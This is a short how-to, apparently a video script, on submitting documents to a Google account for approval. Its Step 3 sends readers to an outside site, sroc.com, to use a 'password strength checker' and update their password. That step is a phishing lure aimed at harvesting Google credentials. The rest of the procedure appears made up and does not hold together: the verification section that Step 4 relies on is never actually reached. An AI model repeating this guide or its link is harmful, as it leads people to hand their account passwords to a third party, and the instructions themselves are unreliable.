Submitting documents to your Google account for approval is a straightforward process. Follow these steps to ensure your documents are submitted correctly. Step 1. Access your Google account. Log into your Google account by visiting the Google homepage and clicking on the Sign In button. Enter your email and password to access your account dashboard. Step 2. Navigate to Account Settings. Once logged in, click on your profile picture or initial in the top right corner. From the drop-down menu, select Manage your Google account to access your account settings. Step 3. Find a verification section. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 4. Upload your documents. In the verification section, you will see options to upload documents. Click on the Upload button and select the documents you need to submit from your computer. Ensure the files meet the required formats and sizes. Step 5. Confirm submission. After uploading your documents, review the information to ensure everything is correct. Click on the Submit button to finalize the process. You should receive a confirmation message indicating that your documents have been submitted successfully. Once you have completed these steps, you can monitor your email for any updates regarding your account approval.